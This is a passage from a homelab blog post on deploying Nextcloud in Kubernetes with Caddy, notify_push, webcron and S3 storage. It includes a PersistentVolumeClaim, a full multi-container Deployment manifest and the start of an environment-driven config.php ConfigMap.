<p>I&rsquo;ve been using Nextcloud&rsquo;s community-led <a href="https://hub.docker.com/_/nextcloud/">FPM image</a>,
which only contains Nextcloud itself, but no web server or anything else.
For serving static assets and also just generally fronting Nextcloud, I&rsquo;m using
<a href="https://caddyserver.com/">Caddy</a>.
For improved performance (or rather, reduced load), I&rsquo;m also deploying the
Rust-based <a href="https://github.com/nextcloud/notify_push">push_notify app</a>.
It sends update notifications to connected clients, instead of needing the
clients to poll the server for changes.</p>
<p>Finally, Nextcloud needs some regular cleanup tasks to be executed. And it being
a PHP app without any scheduling capability, it needs the trigger for those
regular tasks to come from outside the app itself. This can be configured in three
ways:</p>
<ol>
<li>Running a task or two for every page load by a user</li>
<li>Calling a dedicated URL regularly</li>
<li>Setting up a cron job to call a dedicated PHP file</li>
</ol>
<p>I&rsquo;ve opted for option 2), because running a cron job in a container still doesn&rsquo;t
seem to be a solved problem, and I&rsquo;ve found that using option 1) was not enough,
because I don&rsquo;t actually visit the web interface too often.</p>
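<p>Option 2) simply means fetching Nextcloud&rsquo;s <code>cron.php</code> endpoint every few
minutes, and telling Nextcloud to expect that. A sketch, with a placeholder hostname:</p>
<pre tabindex="0"><code># Trigger the background jobs via the webcron endpoint (e.g. from a CronJob)
curl -sSf https://nextcloud.example.com/cron.php

# Switch the background jobs mode to webcron (run inside the Nextcloud container)
php occ background:webcron
</code></pre>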
<p>Then there&rsquo;s also the question of data storage. A couple of years back, after I
got my Ceph cluster up and running, I switched from a file-based backend to
S3. This allowed me to stop worrying about partition sizes at least. But this,
as all too many things in Nextcloud, has its quirks. Most importantly: Not all
data gets stored in the S3 bucket. You still need to provide Nextcloud with a
persistent volume, but at least it&rsquo;s small: for my 10 to 15 year old instance,
it&rsquo;s only 29 MB worth of data. But still, it&rsquo;s there.</p>
<h2 id="preparations">Preparations</h2>
<p>Preparing for the move, I had to set up three volumes.</p>
<p>The first one is the
<em>webapp</em> volume. This volume will be mounted into all of the containers of the
Pod, and it will contain Nextcloud&rsquo;s <code>/var/www/html</code> directory, where the
Nextcloud code lives.
This needs to be an RWX volume, because it needs to be accessed by the Nextcloud
FPM container, the Caddy container and the notify-push container. For this,
I created a 10 GB CephFS PersistentVolumeClaim, as that doesn&rsquo;t have any issues
with concurrent access.</p>
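<p>A rough sketch of what that RWX claim looks like, applied via a heredoc; the storage class
name is a placeholder for whatever the Rook CephFS filesystem is exposed as in the cluster:</p>
<pre tabindex="0"><code># RWX volume for the shared /var/www/html directory
kubectl apply -f - &lt;&lt;EOF
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: nextcloud-webapp
spec:
  accessModes:
    - ReadWriteMany
  storageClassName: rook-cephfs
  resources:
    requests:
      storage: 10Gi
EOF
</code></pre>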
<p>The second volume is for the data. As noted above, this one should not need too
much space due to me using S3 for storage, so it&rsquo;s only 1 GB. And finally there&rsquo;s
a scratch volume for Caddy, which also needs a bit of local storage. But that&rsquo;s
even smaller than the data volume, at only 500 MB.</p>
<p>Nextcloud also needs a database, which I&rsquo;m running on <a href="https://cloudnative-pg.io/">CloudNativePG</a>
again. I&rsquo;ve described how I&rsquo;m migrating databases in detail <a href="https://blog.mei-home.net/posts/k8s-migration-16-gitea/#database-setup-and-migration">here</a>.</p>
<h2 id="nextclouds-deployment">Nextcloud&rsquo;s deployment</h2>
<p>The Nextcloud Deployment manifest is pretty long, due to the number of containers
I&rsquo;m running in the Pod. Here it is in its entirety; I will describe the pieces
in detail later:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">nextcloud</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">nextcloud</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/config-nc</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/nextcloud-config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/config-caddy</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/caddy-config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">33</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">runAsUser</span>: <span style="color:#ae81ff">33</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">runAsGroup</span>: <span style="color:#ae81ff">33</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">initContainers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-init</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">alpine:latest</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/data</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;cp&#34;</span>, <span style="color:#e6db74">&#34;/config/config.php&#34;</span>, <span style="color:#e6db74">&#34;/data/config/config.php&#34;</span>]
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">nextcloud:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/homenet-data/data</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">subPath</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/var/www/html</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">400m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">2048Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">envFrom</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-bucket</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">optional</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-secrets</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">optional</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">configMapRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-bucket</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">optional</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_REDIS_HOST</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;redis.redis.svc.cluster.local&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_REDIS_PORT</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;6379&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_DB_NAME</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">dbname</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_DB_HOST</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_DB_PORT</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">port</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_DB_USER</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_DB_PW</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">password</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-push</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">nextcloud:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;/usr/bin/bash&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-c&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;chmod u+x /var/www/html/custom_apps/notify_push/bin/$(uname -m)/notify_push; /var/www/html/custom_apps/notify_push/bin/$(uname -m)/notify_push&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/var/www/html</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">128Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">NEXTCLOUD_URL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;https://nc.example.com&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">REDIS_URL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;redis://redis.redis.svc.cluster.local:6379&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">PORT</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;{{ .Values.ports.notifyPush }}&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">DATABASE_URL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">uri</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-web</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">caddy:{{ .Values.caddyVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/my-apps/nextcloud</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webscratch</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/data</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/caddy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">400m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">128Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.caddy }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.caddy }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-cron</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">nextcloud:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;/usr/bin/bash&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;/cron-scripts/webcron.sh&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cron-script</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/cron-scripts</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">50m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">50Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">SLEEPTIME</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;5m&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">INITIAL_WAIT</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;10m&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">nextcloud-data</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">nextcloud-webapp</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webscratch</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">nextcloud-webscratch</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-config</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-config</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cron-script</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cron-script</span>
</span></span></code></pre></div><p>The first thing to discuss is the Nextcloud configuration file, which is just
a PHP file, the <code>config.php</code>. It can be split into multiple files, but I&rsquo;ve always had
it all in a single file and decided not to change that. In addition, while looking at the
<a href="https://github.com/nextcloud/docker">README of the container GitHub repo</a>, I
found that the image can also do the entire configuration through environment
variables. That&rsquo;s something to look at later.
The configuration file has one big quirk: it needs to be writable by Nextcloud,
at least during updates, because it also stores the Nextcloud version, which I find
an extremely weird thing to do. This leads to the manual step of updating the
ConfigMap containing the <code>config.php</code> after an update is done.</p>
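<p>As a rough sketch of that manual step (the Deployment name <code>nextcloud</code> is an
assumption here, the container name is the one from the manifest above), the rewritten
file can be pulled out of the running container and compared against the ConfigMap
before pasting it back in:</p>
<pre tabindex="0"><code># grab the config.php that Nextcloud rewrote during the update
kubectl exec deploy/nextcloud -c nextcloud -- cat /var/www/html/config/config.php &gt; config.php
# see what changed compared to the current ConfigMap
kubectl get configmap nextcloud-config -o jsonpath='{.data.config\.php}' | diff - config.php
</code></pre>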
<p>Before I continue, I&rsquo;d like to thank <a href="https://transitory.social/@rachel">@rachel</a>,
who was kind enough to provide me with her Nextcloud manifests and especially
her Nextcloud config file. The most important thing those taught me was the
use of the <code>getenv</code> PHP function, so that I could provide all of the secrets
as environment variables, instead of having to construct an elaborate
external-secrets template.</p>
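<p>One property of <code>getenv</code> worth keeping in mind with this approach: it simply
returns <code>false</code> when a variable isn&rsquo;t set, so a typo in the Deployment&rsquo;s env
section fails silently rather than loudly. A tiny illustration (the second variable name
is deliberately misspelled):</p>
<pre tabindex="0"><code>&lt;?php
var_dump(getenv('HL_DB_USER'));   // string(...) when the Deployment sets it
var_dump(getenv('HL_DB_USERR'));  // bool(false) when it's missing or misspelled
</code></pre>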
<p>As a consequence, my <code>config.php</code> ConfigMap now looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">config.php</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;?php
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    $CONFIG = array (
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;apps_paths&#39; =&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      array (
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        0 =&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        array (
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          &#39;path&#39; =&gt; &#39;/var/www/html/apps&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          &#39;url&#39; =&gt; &#39;/apps&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          &#39;writable&#39; =&gt; false,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        ),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        1 =&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        array (
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          &#39;path&#39; =&gt; &#39;/var/www/html/custom_apps&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          &#39;url&#39; =&gt; &#39;/custom_apps&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          &#39;writable&#39; =&gt; true,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        ),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;instanceid&#39; =&gt; &#39;ID&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;datadirectory&#39; =&gt; &#39;/homenet-data/data&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;objectstore&#39; =&gt; [
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              &#39;class&#39; =&gt; &#39;\\OC\\Files\\ObjectStore\\S3&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              &#39;arguments&#39; =&gt; [
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;bucket&#39; =&gt; getenv(&#39;BUCKET_NAME&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;autocreate&#39; =&gt; true,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;key&#39;    =&gt; getenv(&#39;AWS_ACCESS_KEY_ID&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;secret&#39; =&gt; getenv(&#39;AWS_SECRET_ACCESS_KEY&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;hostname&#39; =&gt; getenv(&#39;BUCKET_HOST&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;port&#39; =&gt; getenv(&#39;BUCKET_PORT&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;use_ssl&#39; =&gt; false,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;use_path_style&#39;=&gt;true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              ],
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ],
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;trusted_domains&#39; =&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      array (
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        0 =&gt; &#39;nc.example.com&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        1 =&gt; &#39;127.0.0.1&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;trusted_proxies&#39; =&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      array (
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        0 =&gt; &#39;127.0.0.1/32&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;memcache.local&#39; =&gt; &#39;\\OC\\Memcache\\Redis&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;redis&#39; =&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      array (
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &#39;host&#39; =&gt; getenv(&#39;HL_REDIS_HOST&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &#39;port&#39; =&gt; getenv(&#39;HL_REDIS_PORT&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;memcache.locking&#39; =&gt; &#39;\\OC\\Memcache\\Redis&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;user_oidc&#39; =&gt; [
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &#39;allow_multiple_user_backends&#39; =&gt; 0,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &#39;auto_provision&#39; =&gt; false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ],
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;allow_local_remote_servers&#39; =&gt; true,
